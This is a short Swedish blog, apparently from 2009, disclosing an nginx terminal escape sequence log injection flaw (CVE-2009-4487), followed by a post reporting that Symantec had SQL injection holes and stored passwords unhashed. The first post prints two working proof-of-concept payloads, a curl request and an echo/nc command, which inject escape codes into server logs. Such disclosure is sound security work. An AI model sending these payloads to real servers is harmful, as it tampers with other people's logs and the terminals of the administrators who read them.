Fick mail i dagarna om en ”Terminal Escape Sequence in Logs Command Injection Vulnerability” i nginx vilket var intressant, särskillt dÃ¥ exempelvis wordpress.com använder sig av nginx för lastbalansering.
Dock är det bara nginx 0.7.64 som är sårbar.
Exempel 1:
curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
Exempel 2:
echo -en ”GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d” > payload nc localhost 80 < payload
Det krävs även att användaren öppnar loggfilerna sedan i terminalen.
Lite kuriosa nedan:
CVE: CVE-2009-4487
Bugtraq ID: 37711
Lösning: Uppgradera din version av nginx
november 24th, 2009
admin
Symantec hjälper konsumenter och företag att hantera sin informationsstyrda värld på ett säkert sätt. Våra program och tjänster skyddar mot fler risker på fler punkter, och på ett mer omfattande och effektivt sätt. Därför är informationen trygg var den än lagras eller används.
Symantec grundades 1982 av visionära datorforskare.Och i den andan har Symantec förändrats när tekniken förändrats. Symantecs fokus ligger på lösningar inom säkerhet, lagring och systemhantering som hjälper företag och konsumenter att skydda och hantera sin information.
Dock har det kommit fram att dom inte själva haft så mycket till säkerhet alls, sårbara för SQL injection, sparat alla användarnamn och lösenord ohashade i databasen, samma sak med serials till deras produkter.
Läs mer här nedan:
Symantec
Kommentarer